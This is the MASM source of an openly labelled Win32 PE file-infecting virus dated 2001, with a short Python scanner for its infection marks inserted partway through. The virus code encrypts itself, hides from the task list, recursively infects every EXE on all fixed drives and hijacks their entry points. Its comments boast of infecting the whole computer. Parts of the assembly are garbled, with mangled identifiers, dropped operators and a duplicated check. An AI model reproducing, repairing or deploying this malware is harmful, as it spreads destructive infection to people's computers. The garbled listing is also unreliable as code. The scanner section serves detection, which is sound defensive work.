[W32.clear by DRCMDA]
; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
; Simple But Clear Win32 PE Infector, Uses Simple XOR Encryption,
; Mutexes and Directory Traversal (On Every Fixed Drive) ... I for
; Myself Don't Like Virii But Since I Discovered The PE-HEADER I
; Just Wanted to Write ONE :) I Tried to Understand 100% of The
; Techniques Used for this purpose SO I wrote everything in this
; Virus on my own. I Also Tried to Optimize Common Structures Like
; Infecting, Api-Base Searching, Dir-Scanning, ... I Would Never
; Spread a Virus, I wrote this Just to Get a better grip with the
; PE Header ;) Hehe Bye ... - DRCMDA [DRCMDA@gmx.de] (c) 2001
; -----------------------------------------------------------------
; P L E A S E   D O   N O T   C O M P I L E   (A N D   R U N !)   T H I S
; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
.486
.Model flat, stdcall
Option CaseMAP: NONE
INCLUDE /MASM32/INCLUDE / WANEL32.INC
INCLUDELIB /MASM32/LIB/kernel32.lib
Virus_size EQU Virus_END - Virus_Start
Max_path EQU 104H
Of_read equ 000h
GHND EQU 002H OR 040H
FILE_ATTRIBUTE_NORMAL EQU 080H
FILE_ATTRIBUTE_DIR EQU 010H
Drive_fixed EQU 003H
.Code
First_gen:
PUSH 0
Call EXITPROCESS
Virus_Start:
Pushhad
Call delta
Delta: POP EBP
Sub EBP, Delta; EBP = DELTA OFFSET
XOR_KEY: MOV DH, 0; WILL BE PATCHED ...
Lea ESI, [EBP E_START]; SO NO XOR EDX, EDX :)
PUSH ESI
MOV ECX, Virus_END - E_START
; _________________ _ _ _ [-Encrypt-] _ _ _ __
Encrypt: XOR BYTE PTR [ESI], DH; EN / DE-CRYPTS THE VIRUS_BDY
ROL DH, 1; Very Lame I Know ...
Inc ESI
Dec ECX
JNZ ENCRYPT
RET
E_START: CALL GET_KERNEL; GET KERNEL BASE
Mov ECX, 27
Lea ESI, [EBP ___kernel32]
Call get_apis; get kernel API's
Call _m01
DB "Blablabla", 0
_M01: Push 1
PUSH 0
Call [_CREATEMUTEX]
Call [_getlasterror]
Test Eax, EAX
JNZ MUTEX_EXIST
Push 1
PUSH 0
Call [EBP _RSP]; Try to Hide from task-list
Call [EBP _GETCOMMANDLINE]; Start Real Host with Winexit
Push 1; Now the user won't notice
Push Eax; ANY Loading-Time Increase
Call [EBP _WINEXEC]
Call infect_everything; the name says all :)
PUSH 0
PUSH 0
Call [EBP _BEEP]
PUSH 0
Call [EBP _EXITPROCESS]; We're Done, The Entire Fucking
; Computer should be infected :)
Mutex_exist:
ERR_EXT: POPAD
Hreturn: Push DWORD PTR Offset First_gen; Return to Host
Ret; Will BE PATCHED LATER
; _________________ _ _ _ [-Get_kernel-] _ _ _ __
GET_KERNEL:; Returns the Kernel Base
MOV ECX, [ESP 9 * 4]; Simple But Small :)
@@: DEC ECX
Movzx EDX, Word PTR [ECX 03CH]; EDX = Pointer to PE_HDR
CMP ECX, [ECX EDX 034H]; Compare Current Base with
JNZ @B; The Kernel Image_Base (MZ)
MOV [EBP _KERNEL], ECX; Store Result
MOV [EBP _DEFAULT], ECX
RET
; ____________________ [-get_apis-] _ _ _ __
GET_APIS:; Scans Through API Table
INC ESI; and RETURNS Addresses
Push ECX
Call get_api; search Single API Address
POP ECX
Movzx EBX, Byte Ptr [ESI - 1]
Add ESI, EBX; Store Address in The
MOV [ESI], Eax; API Table ...
Add ESI, 4
Loop get_apis; Next One
RET
; _________________ _ _ _ [-gET_API-] _ _ _ __
GET_API:; Scans for a Single API ADR
MOV EDX, [EBP _DEFAULT]; EDX = Default Module Base
Add Edx, [EDX 03CH]; Offset PE_HEADER
MOV EDX, [EDX 078H]; EDX = PTR EXPORT_DIR RVA
ADD EDX, [EBP _DEFAULT]; BASE
MOV EDI, [EDX 020H]; EDI = PTR Address_of_names RVA
Add Edi, [EBP _DEFAULT]; BASE
MOV EDI, [EDI]; EDI = PTR ADR_OF_NAMES RVA
Add Edi, [EBP _DEFAULT]; BASE
MOV Eax, [EDX 018H]; EAX = Number_Of_Names
XOR EBX, EBX
NXT_ONE: INC EBX
Movzx ECX, Byte Ptr [ESI - 1]; Length of Specified API Name
PUSH ESI
Push EDI
Repz Cmpsb; Compare API Name with
POP EDI; Export Entry
POP ESI
JZ Found
Push EAX
XOR Al, Al
ScaSB; Get Next One
JNZ $ - 1
POP EAX
Dec EAX; Decrease Number_of_names
JZ Err_ext
JMP NXT_ONE
Found: MOV ECX, [EDX 024H]; ECX = PTR NBR_NAME_ORDS RVA
Add ECX, [EBP _DEFAULT]; BASE
Dec EBX
Movzx Eax, Word PTR [ECX EBX * 2]; EAX = Ordinal Of Function
MOV EBX, [EDX 01CH]; EBX = PTR ADR_OF_FUNCTIONS RVA
Add EBX, [EBP _DEFAULT]; BASE
MOV EAX, [EBX EAX * 4]; EAX = Function RVA !!!!
Add Eax, [EBP _DEFAULT]; BASE
RET
; _________________ _ _ _ [-infect_everything-] _ _ ___
Infect_everything:; Infects Every Fixed Drive !!!
Lea Eax, [EBP DRIVES];
MOV [EBP OFS], EAX; GET Drive Strings
Push EAX
Push 50
Call [EBP _GETLOGICALDRIVESTRINGS]
LOOP_: PUSH [EBP OFS]
Call [EBP _GETDRIVETYPE]; Is IT A Fixed Drive ???
CMP Eax, Drive_Fixed
Jnz Bahhh
Push [EBP OFS]
Call [EBP _SETCURRENTDIR]
Call infect_drive; let's infect it :)
Bahhh: add [eBP OFS], 4; Get Next Candidate
MOV EAX, [EBP OFS]
CMP Byte Ptr [EAX], 0
JNZ loop_
RET
; ____________________ [-infect_drive-] _ _ __
INFECT_DRIVE:; Infects the Whole Drive :)
Lea EAX, [EBP W32Finddata];
Push EAX
Lea Eax, [EBP File_Mask]
Push EAX
Call [EBP _FINDFIRSTFILE]; Start Searching
INC EAX
JZ _S_OUT
Dec EAX
MOV [EBP S_HANDLE], EAX
_S_SCAN: CMP [EBP F_OATITRIBS], File_Attribute_dir
JNZ Nodir
CMP BYTE PTR [EBP FileName], "."; "." and ".." area.
JZ _next
Lea Eax, [EBP FileName]; IF We Found A Directory We set
Push Eax; Set The Cur Dir to this place and
Call [EBP _SETCURRENTDIR]; Continue The Search There ...
Push [EBP S_HANDLE]; Save Search Handle
Call infect_drive; recursive
POP [EBP S_HANDLE]; Get Old Handle and Continue
JMP _next
NODIR: Lea Eax, [EBP FileName]
Push EAX
Call [EBP _LSTRLEN]; EXCUSE my laziness :)
CMP DWORD PTR [EBP FileName EAX - 4], "EXE."
JZ _1
CMP DWORD PTR [EBP FileName EAX - 4], "EXE."
JNZ _next
_1: CMP [EBP FileSizeh], 0; Only Files Under 4 GIGS ...
JNZ _next
Call Infect_file; Exe Found SO Infect It!
_Next: Push 100; Wait 100ms now the user shouldn't
Call [EBP _SLEP]; Notice Any Disk-Usage ... (Hope So)
Lea Eax, [EBP W32FindData]
Push EAX
Push [EBP S_HANDLE]
Call [EBP _FINDNEXTFILE]; GRAB Search_Handle and Search
Test Eax, Eax; More Files That Are Matching To
JNZ _S_SCAN; OUR PATTERN ("*") ...
Lea Eax, [EBP Back]
Push EAX
Call [EBP _SETCURRENTDIR]; ".." Means Get One Dir Back
Push [EBP S_HANDLE]
Call [EBP _FINDCLOSE]
_S_OUT: RET
; ________________ _ _ _ [-Open_File-] _ _ ___
infect_file:; Opens a File And Allocate Mem
Push file_attribute_normal; I don't use filemapping coz
Lea Eax, [EBP FileName]; I Simply Hate ... Imagine
Push Eax; You Map A File and Begin To
Call [EBP _SETFILEATTRIBUTES]; make the first changes, now
; You realize the pe is not
Push of_read; valid or corrupted (Packed
Lea Eax, [EBP FileName]; Files or Some MS PE's
Push Eax; [Outlook]) ... this peh
Call [EBP __LOPEN]; be history now :) I buy it
MOV [EBP FILEHANDLE], EAX; Before and Must Say That
MOV EAX, [EBP FileSize]; I Had Tons of Problems with
Add [EBP MAPSIZE], EAX; THIS TECHNIQUE ...
Push [EBP MAPSIZE]
Push Ghnd
Call [EBP _GLOBALLOC]
MOV [EBP H_Buffer], EAX
Push EAX
Call [EBP _GLOBALLOCK]; Allocate Mem for the File
Test Eax, Eax; Virus_Body
JZ _exit
MOV [EBP M_BUFFER], EAX
Push [EBP FileSize]
Push [EBP M_Buffer]
Push [EBP FILEHANDLE]
Call [EBP __LREAD]; Read Entire File to Buffer
Push [EBP FILEHANDLE]
Call [EBP __LCLOSE]
; ____________________ [-infect_file-] _ _ ___
MOV EDI, [EBP M_Buffer]; EDI = Pointer to Mem Block
CMP Word PTR [EDI], "ZM"; Do Some Checks (MZ / PE / Infmark)
Jnz _exit
Add Edi, [EDI 03CH]; EDI = Pointer to PE_HDR
CMP Word PTR [EDI], "EP"
Jnz _exit
CMP DWORD PTR [EDI 04CH], 0
Jnz _exit
; Get Last Section
MOV ECX, [EDI 074H]; ECX = Number_Of_rva_and_sizes
LEA ECX, [ECX * 8 EDI]; x 8 offset pe_header
Movzx Eax, Word PTR [EDI 006H]; EAX = Number_Of_Sections
Dec Eax; - 1
Lea EBX, [EAX EAX * 4]; EBX = EAX X 28H
Lea EBX, [EBX * 8]; ...
Lea EBX, [EBX ECX 078H]; EBX = EBX ECX 078H
MOV EAX, Virus_Size
XADD [EBX 008H], EAX; Change Virtualsize
CMP EAX, [EBX 010H]
Ja _exit
Push EAX
Push DWORD PTR [EBX 010H]
Add Eax, Virus_size
XOR EDX, EDX
MOV ECX, [EDI 03CH]
Div ECX
INC EAX
Imul Eax, ECX
MOV [EBX 010H], EAX; Change Size_OF_RAW_DATA
POP ECX
Mov Eax, [EBX 010H]
Sub Eax, Ecx; Change Size_OF_IMAGE
Add [EDI 050H], EAX
; Change Attribs & Infmark
OR DWORD PTR [EBX 024H], 0C0000000H
MOV DWORD PTR [EDI 04CH], "BDHP"
POP EAX
Add Eax, [EBX 00CH]
XCHG [EDI 028H], EAX; Change Entry_Point
Add Eax, [EDI 034H]
MOV EDI, [EBX 014H]; Virus_POS = Virt_ADR
Add Edi, [EBX 008H]; Virt_size
MOV ECX, Virus_Size
Sub EDI, ECX
Add Edi, [EBP M_Buffer]
Lea ESI, [EBP VIRUS_START]
Rep Movsb; Write Virus_Body To Buffer
; _________________ _ _ _ [-close_File-] _ _ _ __
Add Byte PTR [EBP XOR_KEY 1], 10
MOV DH, BYTE PTR [EBP XOR_KEY 1]
MOV BYTE PTR [EDI - (Virus_END - XOR_KEY) 1], DH
MOV [EDI - (Virus_END - HRETURN) 1], EAX
Lea ESI, [EDI - (Virus_end - E_START)]
MOV ECX, Virus_END - E_START
Call Encrypt; Encrypt Virus_Body
Push 0; Truncate File and Open
Lea Eax, [EBP FileName]; File for Write Access
Push Eax; (File Attribs Are Set Above)
Call [EBP __LCREAT]
INC EAX
JZ _exit
MOV EAX, [EBX 014H]; FileSize = Virt_ADR
Add Eax, [EBX 010H]; SIZE_OF_RAW_DATA
Push EAX
Push [EBP M_Buffer]; Write Buffer To File ...
Push [EBP FILEHANDLE]; Close File ...
Call [EBP __LWRITE]; Get Rid of Those Memory
Push [EBP FILEHANDLE]; POINTERS AND FREE MEMORY ...
Call [EBP __LCLOSE]; SET OLD File Attributes
_Exit: push [EBP M_Buffer]
Call [EBP _GLOBALUNLOCK]
Push [EBP H_Buffer]
Call [EBP _GLOBALFREE]
Push [EBP F_OATITRIBS]
Lea EAX, [EBP FileName]
Push EAX
Call [EBP _SETFILEATTRIBUTES]
RET
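The header edits infect_file makes are exactly what a scanner can look for: the entry point is moved into the last section, the reserved Win32VersionValue at PE+4Ch is overwritten with the "BDHP" marker (a MASM dword immediate, so the bytes land in the file as "PHDB", just as "ZM" matches the bytes "MZ"), and the last section's Characteristics are ORed with 0C0000000h (READ|WRITE, not EXECUTE). The following Python is an added defensive example, not part of DRCMDA's listing; build_pe constructs a minimal PE32 header set in memory so the checks run offline.

```python
import struct

INF_MARK = b"PHDB"          # bytes left in the file by MOV DWORD PTR [EDI+4Ch], "BDHP"
SCN_EXECUTE, SCN_WRITE = 0x20000000, 0x80000000   # IMAGE_SCN_MEM_EXECUTE / _WRITE

def scan_pe(data: bytes) -> list:
    """Heuristic checks for the header changes made by infect_file (PE32 only)."""
    if data[:2] != b"MZ":
        return ["no MZ signature"]
    pe = struct.unpack_from("<I", data, 0x3C)[0]              # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        return ["no PE signature"]
    nsec = struct.unpack_from("<H", data, pe + 6)[0]           # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 0x14)[0]    # SizeOfOptionalHeader
    opt = pe + 0x18
    entry = struct.unpack_from("<I", data, opt + 0x10)[0]      # AddressOfEntryPoint
    w32ver = data[opt + 0x34:opt + 0x38]                       # Win32VersionValue, must be 0
    last = opt + opt_size + (nsec - 1) * 0x28                  # last section header
    vsize, va, rawsize = struct.unpack_from("<III", data, last + 8)
    chars = struct.unpack_from("<I", data, last + 0x24)[0]     # Characteristics
    findings = []
    if w32ver == INF_MARK:
        findings.append("infection marker PHDB in Win32VersionValue")
    elif w32ver != b"\0\0\0\0":
        findings.append("reserved Win32VersionValue is non-zero")
    if va <= entry < va + max(vsize, rawsize):
        findings.append("entry point inside the last section")
        if not chars & SCN_EXECUTE:
            findings.append("entry section lacks IMAGE_SCN_MEM_EXECUTE")
        if chars & SCN_WRITE:
            findings.append("entry section is writable")
    return findings

def build_pe(entry: int, w32ver: bytes = b"\0\0\0\0") -> bytes:
    """Constructed PE32 header set (.text + .data, no section bodies) for testing."""
    mz = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 0x10, entry)
    struct.pack_into("<III", opt, 0x1C, 0x400000, 0x1000, 0x200)  # ImageBase, alignments
    opt[0x34:0x38] = w32ver
    struct.pack_into("<I", opt, 0x5C, 16)                      # NumberOfRvaAndSizes
    def sec(name, va, chars):
        return struct.pack("<8sIIIIIIHHI", name, 0x1000, va, 0x200, va // 8, 0, 0, 0, 0, chars)
    return (mz + b"PE\0\0" + file_hdr + bytes(opt)
            + sec(b".text", 0x1000, 0x60000020) + sec(b".data", 0x2000, 0xC0000040))
CLEAN = build_pe(0x1000)                    # entry in .text, reserved field zero
INFECTED = build_pe(0x2400, INF_MARK)       # entry moved into .data, marker written
```

Real samples would also need the PE32+ layout and a sanity check on header bounds before indexing; the offsets above match the ones the listing hard-codes (028h entry point, 04Ch marker, 078h + 8 * NumberOfRvaAndSizes for the section table).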
; _________________ _ _ _ [-virus_Data-] _ _ _ __
___Kernel32:;
DB 06, "_ lopen"; API TABLE
__Lopen DD 0; Will BE Filled Up with ADR'S
DB 06, "_ loread"; from a specified module-export
__Lread DD 0; Table (in this case kernel32)
DB 07, "_ lwrite"
__LWRITE DD 0
DB 07, "_ lclose"
__Lclose DD 0
DB 07, "_ lcreat"
__Lcreat DD 0
DB 11, "GLOBALLOC"
_GlobalAlloc DD 0
DB 10, "GLOBALLOCK"
_Globalock DD 0
DB 12, "GlobalUnlock"
_Globalunlock DD 0
DB 10, "GlobalFree"
_GlobalFree DD 0
DB 13, "findfirstfile"
_Findfirstfile dd 0
DB 12, "findnextfile"
_FindNextFile DD 0
DB 09, "FindClose"
_FindClose DD 0
DB 17, "SetFileAttributes"
_SetFileAttributes DD 0
DB 17, "getFileAttributes"
_GetfileAttributes DD 0
DB 19, "setcurrentdirectory"
_SETCURRENTDIR DD 0
DB 22, "getLogicalDriveStrings"
_GetLogicalDriveStrings DD 0
DB 12, "getDriveType"
_GetdriveType DD 0
DB 07, "lstrlen"
_LSTRLEN DD 0
DB 04, "beep"
_Beep DD 0
DB 11, "CREATEMUTEX"
_Createmutex DD 0
DB 12, "ReleaseMutex"
_RELESEMUTEX DD 0
DB 12, "getLastError"
_Getlasterror DD 0
DB 11, "EXITPROCESS"
_Exitprocess DD 0
DB 22, "RegisterServiceProcess"
_RSP DD 0
DB 14, "getcommandline"
_GetCommandline DD 0
DB 07, "WINEXEC"
_Winexec DD 0
DB 05, "SLEEP"
_SLEEP DD 0
_Kernel DD 0; Base Placeholders
_Default DD 0
Mapize DD Virus_size 1000H
FileHandle DD 0
H_Buffer DD 0
M_Buffer DD 0
W32FindData:; Win32_Find_Data Struc
F_oattribs DD 0
DD 6 DUP (0)
FileSizeh DD 0
FILSIZE DD 0
DD 2 DUP (0)
FileName DB Max_Path Dup (0)
DB 14 DUP (0)
File_mask DB "*", 0
Drives DB 50 DUP (0)
BACK DB "..", 0
S_handle DD 0
OFS DD 0
Virus_end:
END VIRUS_START